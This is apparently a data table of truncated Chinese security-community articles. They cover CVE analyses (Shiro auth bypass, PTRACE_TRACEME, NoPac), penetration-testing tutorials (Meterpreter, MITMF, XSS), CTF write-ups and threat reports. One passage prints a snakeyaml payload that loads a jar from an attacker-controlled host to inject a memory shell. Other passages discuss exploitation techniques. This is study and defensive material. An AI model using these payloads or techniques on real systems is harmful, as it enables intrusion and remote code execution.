text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# Apache Shiro 两种姿势绕过认证分析(CVE-2020-17523)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:jweny[@360](https://github.com/360 "@360")云安全
## 0x01 漏洞描述
Apache
Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
当它和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。
影响范围:Apa... | 社区文章 |
# 【知识】10月16日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要: Airtame设备上存在多个漏洞、预测、解密和滥用WPA2/802.11Group
Keys、TPM中的漏洞可能允许安全功能绕过、有人通过伪造Tor隐藏服务来进行钓鱼、RFSec-ToolKit:HackRF、BladeRF学习资源汇总、看我如何破解ATM,并在2分钟内取走100万**
********
****国内热词(以下内容部分来自:<http://www.solidot.org/> )****
高通寻求在中国禁售和停产iPhone
库克称学编程比学英语更重要... | 社区文章 |
# CVE-2019-13272 'PTRACE_TRACEME' 本地提权漏洞分析(二)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
前面一篇文章介绍了CVE-2019-13272引发的第一个问题,通过race 可以导致系统
panic,接着上面一篇文章,这篇文章会介绍cve-2019-13272提到的第二个问题,它可以通过 suid 程序达到本地提权的目的
由于自身水平有限,有些地方可能理解不当,望指正。
## 漏洞原理
jannh 给出的利用逻辑如下
对于一个普通用户,考虑下面场景
1. task A fork 出task B
2. task B fork 出t... | 社区文章 |
# 曲折的命令执行回显
## 0x01.命令执行
日常漏洞挖掘中发现了一处若依系统,进入后台后尝试使用常规方法加载jar包来注入内存马
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"]]]]')
执行定时任务后,系统成功访问到了放在vps上的jar包
尝试访问内存马,直接跳转回登录界面,内存马注入失败(之后f0ng师傅研究了一下,若依4.2版本的系统使... | 社区文章 |
**作者:长亭科技
PDF阅读:<https://images.seebug.org/archive/%E9%95%BF%E4%BA%AD%E6%8A%80%E6%9C%AF%E4%B8%93%E6%A0%8F2018%E5%B9%B4%E5%BA%A6%E6%96%87%E9%9B%86.pdf>**

长亭技术专栏是长亭科技在知乎上开设的基于技术探讨的专栏,作者主要为长亭科技的技术人员,文章内容包括但不限于网络安全领域。201... | 社区文章 |
**原文链接:<https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader>**
**译者:知道创宇404实验室翻译组**
### 概要
国庆假期之后,安全研究人员观察到APT组织TA416重新开始了活动。这次活动以在非洲开展外交活动的组织为目标。攻击者对工具集进行更新以逃避检测,该工具集用于传递PlugX恶意软件的有效负载。研究人员发现了TA416的PlugX恶意软件新的Golang变种,并且确定了攻击者在活动中对PlugX恶意软件的持续使用。
### 新的网络钓鱼活动
研... | 社区文章 |
# 3月20日安全热点 – 黑客大会提供硬件后门Bicho可远程控制汽车
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 资讯类:
黑客大会提供硬件后门Bicho可远程控制汽车
<https://news.hitb.org/content/backdoor-allowing-remote-control-cars-be-presented-amsterdam-hacker-conference>
每200个Google搜索建议中就有一个被污染
<https://www.bleepingcomputer.com/news/google/one-in-every-200-google-s... | 社区文章 |
# 群控进化史,黑产攻击效率提升带来的防守困境
##### 译文声明
本文是翻译文章,文章原作者 威胁猎人,文章来源:威胁猎人
原文地址:[https://mp.weixin.qq.com/s?timestamp=1560996683&src=3&ver=1&signature=uWV-sCYTwVs5kC*XhRRIUV8Dl2JJ7ejMjXUJuDBzHw-yiIsWaayr6fuXbvZr7LsxR51poGvB5b9EkVptGsMJSA6tkflFjaqhU-YZ5ZXWcedfpaDNY6b3C1daLjbN3UbYf6r2ssysHSneQ5qwFf69Jjn7ubIbaa2Xo1SSLAdf57o=](https:... | 社区文章 |
原文来自安全客,原文链接:<https://www.anquanke.com/post/id/153621>
**[BlackHat USA 2018](https://www.blackhat.com/ "BlackHat USA
2018")已经结束,我们目前收集到了BlackHat今年75%的议题PPT,欢迎各位安全爱好者下载学习。**
**下载链接:<https://yunpan.360.cn/surl_ydv5brvsi49> (提取码:7ce7)**
#### 活动简介
如果让世界黑客选出一个最顶尖的黑客会议,那Black Hat一定会以压倒性优势被投票选出,Black
Hat在世界黑客心中相当于一年一度的“世界杯”和“... | 社区文章 |
# 堆中index溢出类漏洞利用思路总结
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 写在前面
被问到这个问题,突然就意识到好像只能想到一个改`got`表的思路,有点丢人emmmm
于是做个总结,如果还有遗漏,欢迎大佬在评论区指出,我会在后续文章完善。
## 0x02 越界篡改GOT表
### 适用情形
1. 题目没有开启`FULL RELRO`保护。
2. 程序有可用`GOT`表项。
### 以 2020-CISCN-摩尔庄园的记忆 为例
我是本题的出题人,本题理论上应当用于2020年全国大学生信息安全竞赛,但是不知为何此题未出现,本题将会后续更新到我的Git... | 社区文章 |
# 【技术分享】文件格式Fuzz实践
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
作者:[o0xmuhe](http://bobao.360.cn/member/contribute?uid=32403999)
预估稿费:300RMB
投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao.360.cn/contribute/index)在线投稿
**0x00: 前言**
笔者整理去年的笔记的时候,发现了躺在印象笔记里的使用peach来进行文件格式fuzz的笔记,所以经过整理就有... | 社区文章 |
## Intro: 一道 Realworld Browser Writeup
## 写在前面
这道 `Realworld pwn` 出现在数字经济云安全的线下赛。
## Patch
关键的 `Patch` 如下:
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index e6ab965a7e..9e5eb73c34 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -36... | 社区文章 |
# ZbzCMS 2.1代码审计
## 0x00 前言
这套系统漏洞百出,只能说开发祭天,法力无边.
源码Download: <https://pan.baidu.com/s/1DOFYZKdTAlpPiZ-MwEVXFw>
使用工具:Seay源代码审计系统,Nodepad++,Phpstudy
## 0x01 存储型 XSS
定位到一处存储Xss:
**/cms/common/php/ajax.php**
构造Payload:
POST /cms/common/php/ajax.php?run=liuyan HTTP/1.1
Host: x.x.x.x
Connection: keep-al... | 社区文章 |
# 仅一条短信就可以劫持你的手机
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
漏洞无处不在,没有一个系统是天衣无缝的。
【导读】几天前,国外某安全公司研究人员告警称:SIM卡被发现存在严重漏洞,远程攻击者可利用漏洞在用户不知情的情况下发送短信,攻击目标手机,监控跟踪受害者。据悉,全球或有超10
亿手机用户会受危害。目前,事件还在持续发酵,而针对该事件,智库提取了几个关键点希望引起各方重视。此外,还需引发高度重视的是:早在2015年,就已有媒体曝出:NSA已入侵全球手机SIM卡。
上周四,国外某安全公司发布一份重要报告称,攻击者利用Simjacker漏洞可以向目标用户手机发送一条短信,短信中包含... | 社区文章 |
# Gartner2020年十大安全项目详解
##### 译文声明
本文是翻译文章,文章原作者 Benny Ye,文章来源:专注安管平台
原文地址:<https://mp.weixin.qq.com/s/yuNalHkhcJJIPNE4QjG_aw>
译文仅供参考,具体内容表达以及含义原文为准。
转载:[专注安管平台](https://mp.weixin.qq.com/s/yuNalHkhcJJIPNE4QjG_aw)
【前言】本文不是译文,是结合笔者自身体会的解读!不能代表Gartner的本意。如有不同观点,欢迎通过本人微信公众号“专注安管平台”进行留言沟通。
## 1 概述
受疫情的影响,2020年中例行的Gartner安全与风... | 社区文章 |
# 对抗式验证码生成系统:针对深度学习破解器的防御
|
##### 译文声明
本文是翻译文章,文章原作者 Chenghui Shi, Shouling Ji , Qianjun Liu, Changchang Liu ,
Yuefeng Chen, Yuan He, Zhe liu, Raheem Beyah,Ting Wang,文章来源:nesa.zju.edu.cn
原文地址:<https://nesa.zju.edu.cn/download/Text%20Captcha%20Is%20Dead%20A%20Large%20Scale%20Deployment%20and%20Empirical%20Study.pdf>
译文仅... | 社区文章 |
# 0 前言
公司的每月任务同事没完成数量就帮忙看了一下,发现到了个查不到的问题就来分享了一下。
# 1、渗透路程
首先从资产列表中随便选了一个站:<http://www.xxxxx.org.cn> 。然后就习惯性的先点击插件link-grabber看看网页有包含了什么链接
这路径一看直接猜测一波帝国cms好吧。直接猜一波后台路径/e/admin,哦吼果然没那么简单。
那就看一下前台登录路径看得不得/e/member/login/,呀呼,前台可以
本来下面应该是empire cms的不知道被改成了什么意思的cms,不过版本号可能就没改,那就可能是帝国cms7.2的版本了。
点击会员列表看到只有一个admin的账户,想着爆破一波弱口令... | 社区文章 |
奖金和积分选的是前50名的大概情况
奖金排名情况:
[code]id 奖金 积分 税后奖金
Gr36_ 254950 7050 203960
kernel_dbg 203260 5835 162608
YYY 201520 4490 161216
A 175100 4770 140080
Z 155670 3443 124536
X 147250 4062 117800
bey0nd 136480 4717 109184
K 132880 3389 106304
凤凰师傅 125600 2055 100480
换个昵称 113850 3150 91080
安识科技_4爷 113780 65... | 社区文章 |
# 探Python Opcode逃逸笔记
gamous@星盟
> 菜鸡好奇的目光看向了py
不同版本python的PyCodeObject参数数量有一定差异,但大同小异,本文在Python3.8环境下进行探索
## PyFrameObject
在Python里,一切皆对象,函数也不例外
Python虚拟机的执行环境基于PyFrameObject栈帧,一个线程有一个栈帧链,在栈帧环境中根据执行PyCodeObject对象,从中取出对应的字节码序列在执行机中执行。
栈帧构造如下
struct _frame {
PyObject_VAR_HEAD
struct _frame *f_back; ... | 社区文章 |
来自i春秋作者 [zusheng](http://bbs.ichunqiu.com/thread-10580-1-1.html?from=paper)
### 前言
熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。
### 目录
第一节 初识Meterpreter
* 1.1、什么是Meterpreter
* 1.2、Meterpreter的优点
第二节 Meterpreter中常用的Shell
* 2.1、reverse_tcp
* 2.2、reverse_http... | 社区文章 |
### 0x01 WiFi简介
智能手机的快速发展已将近十年左右,较之旧款的非智能手机,最大的区别应该是在于其强大的上网功能。在4G技术已经普及的今天,无奈国内的电信运营商们把移动联网流量的价格抬的让人无法深爱,加之家庭用户和企业用户对于物理网络线缆的愈发嫌弃,WiFi技术的飞速发展给大家带来了另一种畅游网络的便捷。人们已经习惯于保持手机的WiFi功能打开状态,习惯于走进一个理发店小饭馆先找找墙上哪里贴着WiFi账号密码的标签纸。但是便捷带来的不仅是使用的方便,还有常被人忽视的安全隐患。
我们先解释一下WiFi这个名词。WiFi普遍的定义是一种允许电子设备连接到一个无线局域网(WLAN)的技术,有些WiFi设置成加密状态,也有些... | 社区文章 |
# 浅谈信息收集的那些事儿
* * *
# 前言
> 大佬都说信息收集最重要啦~
> 懒就没有洞啦~
>
>
# Go
## 子域名收集
> 一切的开始,当然是子域名枚举,于是很关键的工具们登场了
这里推荐三个很好用的工具,也是最常用的三个。
> [amass](https://github.com/OWASP/Amass)
> [sublist3r](https://github.com/aboul3la/Sublist3r)
> [aiodnsbrute](https://github.com/blark/aiodnsbrute)
子域名的收集方法目前大部分都是:爆破,搜索引擎收集,dns查询,证书查询。... | 社区文章 |
# 盘点2017年的WordPress插件漏洞
##### 译文声明
本文是翻译文章,文章原作者 Dr. Johannes Dahse,文章来源:ripstech.com
原文地址:<https://blog.ripstech.com/2017/wordpress-plugin-vulnerabilities-static-analysis/>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[WisFree](https://www.anquanke.com/member/118146)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
## 前言
据[统计](https://blo... | 社区文章 |
# MITMF
## 0x00. MITMF简介
###
MITMF其实就是一个基于python编写的中间人攻击的框架,就好比metaspoit一样,无比强大且但十分易用。下面笔者就给大家介绍一下它有哪些用途,本文具有攻击性,大家最好在自己的实验环境中使用。
* * *
## 0x01. MITMF安装
> apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-> queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3
> libcapstone-dev l... | 社区文章 |
# 【知识】6月26日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要:
针对巴基斯坦的某APT活动事件分析、dnsAutoRebinding:ssrf、ssrf内网地址fuzz、dns二次rebinding、支持ipv4/ipv6、支持ip地址转码、dns记录污染(文末一个0day为例)
**、** Python Waf黑名单过滤下的一些Bypass思路、Alpine Linux:从漏洞发现到代码执行(Pt 1 of 2)、Tomcat
源代码调试笔记 – 看不见的 Shell **、**** **T00LS帖子正文XSS、pwn Viv... | 社区文章 |
# 2018护网杯线上赛writeup by 天枢
author: 天枢
## Pwn
### huwang
emmmm,只有666功能里面有用,里面会打开一个文件,然后写随机数进去,而在md5的时候,会先清空文件内容,然后再将md5之后的数据写入到文件中,如果这时候给个-1程序就会超时,自动杀死自己,结果导致文件内容为空,这样就可以预测,剩下的就是一个栈溢出了。。。。
from pwn import *
context(arch = 'amd64', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.termin... | 社区文章 |
# 2022年工业信息安全技能大赛“望岳杯”锦标赛 wp
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 恶意文件
动调动调
OD直接动调,更具xxx的流程图可以看到程序的整体结构,然后结合流程图使用OD动调
最终ip地址是存在了`[ebp+ecx-0x14]`的位置
将这一处跳转和两处的exit nop掉
跟踪到`[ebp+ecx-0x14]`在内存中的位置,一直F8就可以了
这里是端口,小端排序 `1F
57`,转换成十进制就是8023,前边在存储ip地址的时候就已经存到`[ebp-0x1D0]`的位置了,所以最终ip:1.15.228.170:8023
**flag{1.15... | 社区文章 |
## 0x00 前言
* * *
在渗透测试中,远程桌面连接的历史记录不可忽视,根据历史记录往往能定位出关键的服务器。
前几天有一篇文章介绍了如何清除记录,那么这篇文章就来介绍一下如何导出历史记录。
清除记录的文章地址如下:
<http://woshub.com/how-to-clear-rdp-connections-history/#h2_3>
最开始的设想是通过枚举注册表就能够完成,但深入研究发现,想要获得所有用户的历史记录,需要逐个获得用户的NTUSER.DAT文件,通过注册表加载配置单元,导入用户配置信息,再进行枚举才能够实现。
## 0x01 简介
* * *
本文将要介绍以下内容:
* 获得历史记录的思路
* ... | 社区文章 |
>
> 一直想要入门chrome漏洞挖掘,于是就打算从一道[CTF题目](https://ctftime.org/task/6081)入手(其实也是一个真实的漏洞),这篇文章记录了我的学习过程,是一个总结,也希望能帮到同样在入门的朋友。
# 调试环境
* Ubuntu16.04 x64
* [pwndbg](https://github.com/pwndbg/pwndbg)
## v8调试环境搭建
* 这里主要参考了sakura师傅的教程
* <http://eternalsakura13.com/2018/05/06/v8/>
* 以及最重要的一点,挂代理,这里我使用的是`polipo`
* <ht... | 社区文章 |
# 作者个人b站:<https://space.bilibili.com/4404257>
昨天朋友发现了一个xss,审核人员要求提出造成这个洞的原因,所以需要去找这个洞的生成函数,然后按照正常流程:先找页面中生成的触发xss的节点-》再通过该节点的特征(比如类名,属性等)来全局搜索生成这些特征的特定生成函数。但是!发现这个过程第一步就没有——也就是说,页面中并没有节点中存在事件为onerror=alert(1)的节点。所以这里我猜测,可能是临时或者类似eval的生成函数,所以要找的话就比较麻烦。
想了一下——既然触发了alert函数,那我直接hook alert这个函数不就好了?说做就做
* * *
首先了解一下在js下的hook... | 社区文章 |
# 水果博主骗局
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
人人都知道天下没有免费的午餐,但当人们真正遇到免费午餐时却难以抵制心中的诱惑。近期,社交平台出现了一群“水果博主”,主要利用用户爱贪小便宜的心理,通过“推广网店、水果丰收免费赠送”为由吸引用户加入群聊,之后利用人们网络兼职轻松赚钱的心理,以“帮农场APP提高人气和提升网店排名,筹备上架”为由诱导用户下载某款APP、充值做任务,从而一步一步套路用户大量充值金额,最后以各种理由推迟返款、提现对用户实施诈骗。
前两天刷微博的时候发现一群利用微博宣传免费送赠水果的博主,抱着好奇的心态便关注了其中一位博主,并按照他的要求进入了一个群聊,群主在... | 社区文章 |
* 前段时间听到几位大佬对NoSQL注入相关问题进行了热烈的讨论,于是事后做了一些简单了解。本文纯属个人扯淡,与技术无关。行文仓促,如有任何问题欢迎指正。
### 说在前面的话
这篇文章不是为了告诉大家如何挖掘SQL注入漏洞或SQL注入相关的实战技巧,我相信能够看完这篇文章的同学在实战能力和经验上一定比我强很多。撰写本文的目的也仅仅是我突然无聊的想从多个层面去了解更多关于SQL注入,或者说是SQL语句执行本身相关的细节内容,让自己更清晰的理解SQL注入的原理和本质,以及期待在分析过程中发生一些意外的思维碰撞。
那让我们开始吧。
### 关系型数据库SQL注入
不用多说,提到SQL注入,我们首先想到的肯定是传统关系型数据库中最常见的`... | 社区文章 |
# 【技术分享】构建XSS Payload是一门艺术,用最简单的方法绕过XSS的缓解方案
|
##### 译文声明
本文是翻译文章,文章来源:brutelogic
原文地址:<http://brutelogic.com.br/blog/the-easiest-way-to-bypass-xss-mitigations/>
译文仅供参考,具体内容表达以及含义原文为准。
****
**翻译:**[ **WisFree**](http://bobao.360.cn/member/contribute?uid=2606963099)
**预估稿费:200RMB(不服你也来投稿啊!)**
******投稿方式:发送邮件至**[ **linwe... | 社区文章 |
# 0day漏洞组合拳:详细分析一款恶意PDF样本
##### 译文声明
本文是翻译文章,文章原作者 Anton Cherepanov,文章来源:https://www.welivesecurity.com
原文地址:<https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
2018年3月末,ESET研究人员发现了一款非常有趣的恶意PDF样本。经过仔细研究后,我们发现该样本利用了之前未知的两个漏洞:Adobe
Reader中的一个远程命令执行漏洞以及Microsoft Windows中的一个权限提升漏... | 社区文章 |
# 威胁猎人:2017年度中国互联网黑产报告
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 声明
本文中所有数据均来自于威胁猎人威胁情报中心于2017年捕获和收集的数据,猎人君将以最客观的角度进行数据呈现,数据与真实情况可能存在误差。任何机构和个人不得在未经威胁猎人授权的情况下转载本文或使用本文中的数据。
## 概述
2017年,纵观全球网络安全事件,从黑客组织Shadow
Brokers泄露NSA的漏洞利用工具EternalBlue,到WannaCry勒索软件席卷全球,从国内58同城简历数据泄露,到国外信用机构Equifax被黑客入侵,黑灰产业蓬勃发展。
只有事件爆发后才能察觉问题,这使... | 社区文章 |
# 开源软件代码安全缺陷分析报告——物联网软件专题
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
近日,CNCERT发布了《开源软件代码安全缺陷分析报告——物联网软件专题》。本期报告选取全球20款知名物联网软件进行源代码安全缺陷分析,结合缺陷分析工具和人工审计的结果,评估项目的安全性。360代码卫士团队为本期报告提供了技术支持。
## 1、概述
随着软件技术飞速发展,开源软件已在全球范围内得到了广泛应用。数据显示,99%的组织在其IT系统中使用了开源软件。开源软件的代码一旦存在安全问题,必将造成广泛、严重的影响。为了解开源软件的安全情况,CNCERT持续对广泛使用的知名开源软件进行源代码安全缺陷... | 社区文章 |
# 骑士人才系统漏洞挖掘
## SE版的前台sql注入漏洞。
此漏洞仅仅影响 骑士CMS人才系统SE版
在 `/application/index/controller/jobfairol.php` 中存在如下方法
注意此处的 keyword。存在两次 url 解码,可以绕过很多的 waf,或者预处理。
先join 里一个数据表,然后添加排序,并指定分页后,调用 column() 方法。
这个方法也就是获取 sql查询某个列的数组。
并在该断点处,执行sql语句。
查看一下我们实际执行的sql语句。
我利用 union select 来达到时间盲注的效果。
payload:
http://localhost:1234/?s=... | 社区文章 |
**作者:启明星辰ADLab
公众号:<https://mp.weixin.qq.com/s/bXPmfp316WC6R0yHULU-jA>**
### 一 概述
近期,启明星辰ADLab接连捕获到大量针对全球制造、运输、能源等行业及部分医疗机构发起的鱼叉式钓鱼邮件定向攻击。从邮件的分析结果来看,受害者大多遍布于美国、加拿大、德国、中国、英国、法国、西班牙等国家和地区。攻击者以“装船通知单”、“装箱交货价单”、“紧急运输文件”等主题邮件作为诱饵向攻击目标植入信息窃密木马(Agent
Tesla、Formbook、Lokibot)和远程控制程序(NanoCore、Remcos)。我们通过对收集到的攻击工具进行去重并做分析,最终发现... | 社区文章 |
# 数据泄露事件频发 “数据安全”创业机会何在
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者 | 吴文超 晨山资本副总裁
邮箱 | wenchao#chenshancapital.com
编者按:本文来自微信公众号“晨山资本”(ID:chenshancapital)。
随着线上化、数字化、智能化的发展,万物互联时代的逐步到来,数据体量正在快速增长。而无论是个人隐私数据,还是企业数据,都承载着巨大的价值,数据泄露事件已成为安全领域最大的威胁之一。安全产品的价值和其保护资产的价值永远成正比关系。面对数据安全这一蓝海市场,未来伴随着法律法规的健全,我们相信一定会诞生巨大的创新和创业机会。
## ... | 社区文章 |
# 2021 DASCTF July X CBCTF 4th 部分WriteUp
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 引言
> **2021DASCTF 实战精英夏令营预热赛暨 DASCTF July X CBCTF 4th**
>
> <https://buuoj.cn/match/matches/15/challenges>
又是摸鱼的一个周末,不过这个比赛和 巅峰极客网络安全技能挑战赛 冲突了,那个比赛写了点 wp 在下面这篇。
[CTF | 2021 巅峰极客网络安全技能挑战赛
WriteUp](https://miaotony.xyz/2021/08/07/CTF_... | 社区文章 |
# v8漏洞学习之issue1195777&issue1196683
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
前段时间曝光了两个v8引擎的漏洞,这里记录一下自己对这两个漏洞的学习。
## 1195777
### poc:
function foo(b){
let y = (new Date(42)).getMilliseconds();
let x = -1;
if(b) x = 0xFFFF_FFFF;
let c = Math.max(0, x , -1);
return -1 < c;
... | 社区文章 |
# 卡巴斯基 - 2019年Q1垃圾邮件与钓鱼攻击统计分析
|
##### 译文声明
本文是翻译文章,文章原作者 securelist,文章来源:securelist.com
原文地址:<https://securelist.com/spam-and-phishing-in-q1-2019/90795/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、概述
在2019年第一季度,垃圾邮件在全球电子邮件流量中的平均占比略微增长了0.06个百分点,达 55.97%。
卡巴斯基反钓鱼系统共阻止了111,832,308 个将用户重定向至钓鱼网站的攻击尝试,比前一报告期内(2018年第四季度)增长了35,220,650。
一如既往,... | 社区文章 |
原文:<https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning>
## 0x00 概述
在本文中我将介绍如何使用JavaScript构造端口扫描器,如果大家感兴趣,可以直接从[此处](http://portswigger-labs.net/portscan)下载这款工具。
## 0x01 基于Chrome浏览器的实现
关于从Internet(互联网)区域到Intranet(内部网)区域进行端口扫描方面的内容,网上已经有一些研究文章。[Jeremiah
Grossman](https://blog.jeremia... | 社区文章 |
# 各类灰黑产钓鱼邮件概括分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
在样本的逆向分析中,我们接触到的大多数是直接拿到的恶意样本,有的是PE文件;有的是包含恶意宏代码的office文档;有的是带有漏洞利用的office文档;有的是APK文件;有的是HTA文件;有的只是一个简单的LNK文件……
在分析这些恶意样本的同时,我们也知道这些样本不是凭空出现在这里,出现在受害者的计算机上的。样本从哪来来,它要到哪里去,它通过什么方式去。这些都是很有意思的问题,在本文中,笔者对恶意软件投递的主要分支-钓鱼邮件进行了一个简单的分析,希望大家能喜欢~
首先,个人认为钓鱼攻击和鱼叉攻击是不... | 社区文章 |
测试CSRF中,目前已知
<iframe src="javascript:'<script
src=目标></script>'">发送的请求可以不带referral和origin。。但有点鸡肋
以上类似的方法,用fetch post可以让origin为null但就是消不掉啊。。
还有就是fetch的no-cors模式,但这个控制不了content-type啊。。。 | 社区文章 |
# CVE-2021-42278 + CVE-2021-42287(NoPac)利用指南
author:Su1Xu3@深蓝攻防实验室
CVE-2021-42278 + CVE-2021-42287
## 原理
CVE-2021-42278,机器用户应当是computer$的形式,但是实际并没有验证机器账号是否有$。导致机器用户名可以被模拟冒用。
CVE-2021-42287,使用computer的TGT通过另一个用户去请求computer自己的ST时,将TGT发送给KDC后,当KDC找不到computer。KDC会再次寻找computer$的ST,从而获得了computer$的ST。从而获得了computer$的权限。
## 利用条... | 社区文章 |
Kaggle上最新举办的第二届微软恶意软件预测挑战赛。
# 0x01 比赛简介
## 比赛目的
这个Kaggle比赛是由微软联合美国东北大学、佐治亚理工学院共同推出的比赛,本次比赛的主题是恶意软件攻击预测。恶意软件行业仍然是一个组织有序、涉及资金量大的致力于规避传统安全措施的市场,一旦计算机被恶意软件感染,犯罪分子就会以多种方式伤害消费者和企业。微软用于超过10亿的企业和消费者客户,非常重视这一问题,并在提高安全性方面投入了大量资金。作为其整体战略的一部分,微软正在挑战数据科学技术用来预测机器是否很快就会被恶意软件攻击。与之前2015年的恶意软件挑战赛一样,微软正在为Kagglers提供前所未有的恶意软件数据集,以鼓励在预测恶意软件... | 社区文章 |
# Apple逆向工程中的sysloged bug
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://reverse.put.as/2016/01/22/reversing-apples-syslogd-bug/>
译文仅供参考,具体内容表达以及含义原文为准。
两天前,苹果公司(Apple)发布了OS X El Capitan(Mac
OS)的10.11.3更新版,同时更新了Yosemite和Mavericks两款Mac操作系统的安全服务。(Yosemite:OS X
Yosemite(优胜美地)是2014年6月苹果在全球开发者大会—WWDC
2014,发布的新一代Mac操作系统,版本号... | 社区文章 |
# Fuzzingbook学习指南Lv3
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
上篇文章中我们讲到了输入的“变异”以及选择“变异”模式的一些心得,这篇文章我们就来看看实现模式选择的一些技术细节。同时我们也要跳出单一路径的思想,让我们的fuzzing找到更多的路径。
## CFG
cfg是程序控制流图(control flow
graph)的简写,说大白话就是将程序按照if、else、while、函数调用等进行“分块”,然后根据调用顺序连线即可,就类似我们生活中用到的流程图。搞逆向的小伙伴应该不陌生,ida
pro就会对逆向的程序进行解析,并生成对应的cfg。对于程序来讲,我们经常通过... | 社区文章 |
> 先知原创作者翻译:[原文链接](https://andresriancho.com/recaptcha-bypass-via-http-> parameter-pollution/ "原文链接")
## 摘要
在今年一月下旬,我向Google提交了一个reCAPTCHA认证绕过漏洞。当然,该漏洞的前提条件是,采用reCAPTCHA认证机制的Web应用程序以不安全的方式构造提交给/recaptcha/api/siteverify的请求;并且,只要符合这一条件,攻击者总能成功绕过reCAPTCHA认证机制。由于这个安全问题是通过修改Google的reCAPTCHA
API进行修复的,所以,使用该认证机制的Web应用程序无需进行任何修... | 社区文章 |
# 如何利用Microsoft.Workflow.Comiler.exe执行未签名的任意代码
|
##### 译文声明
本文是翻译文章,文章来源:posts.specterops.io
原文地址:<https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
`Microsoft.Workflow.Compiler.exe`是.NET
Framework中默认包含的一款实用工具,攻击者可以以XOML文... | 社区文章 |
**作者:360漏洞研究院
原文链接:<https://vul.360.net/archives/413>**
## 0x01 简介
lot设备漏洞挖掘,其实核心就是拿到运行在硬件设备内的“软件”,然后就变成了常规的软件漏洞挖掘。剩下的就是常规的漏洞挖掘步骤就跟软件漏洞挖掘步骤一致,进行逆向和审计即可。本文主要介绍机架式、虚拟镜像形式的防火墙堡垒机等安全设备的漏洞挖掘步骤及思路。文后也将展示部分相关设备的漏洞挖掘成果。
## 0x02 固件存储位置及提取方法
通常路由器或摄像头等小型IOT设备的固件一般存放于各种小型flash芯片中,而机架式硬件类型防火墙、VPN类设备区别于其他固件存放的位置在于其多用SSD固态硬盘、SATA2... | 社区文章 |
# Windows下利用IoDriverObjectType控制内核驱动加载的探索与研究
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
在edr或者其他类型的安全软件我们通常要监测当前系统的内核驱动的加载,通常使用的方法是PsSetLoadImageNotifyRoutine设置模块加载回调例程来监控ring3模块以及ring0模块的加载,回调函数
eLoadImageNotifyRoutine 的第二个参数判断,如果 PID是0 ,则表示加载驱动,如果PID非零,则表示加载DLL。此方法的优点是:
**更底层
方法简单通用**
缺点当然也就是函数太底层,第二就是方法太通用几乎做过进程、线... | 社区文章 |
# 网络安全对抗中蓝方防护技巧秘籍
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
护网行动,攻击方的专业性越来越高,ATT&CK攻击手段覆盖率也越来越高。这对于防守方提出了更高的要求,护网行动对甲方是一个双刃剑,既极大地推动了公司的信息安全重视度和投入力量,但同时对甲方人员的素质要求有了很大提升,被攻破,轻则批评通报,重则乌纱帽不保;关于蓝方防守的文章已经很多了,作为参与了2年护网的甲方,总结了一些防御的基本要素,简单明了,抛砖引玉,给大家参考。
## 一:护网设备套餐
在护网前,各种安全公司都会推销花样很多的护网套餐,如果不差钱的主当然是多多益善,但是相当多的企业估计也没那么土豪,所以从自身... | 社区文章 |
## 前言
这绝对是我玩过的最乏味的一次XSS。
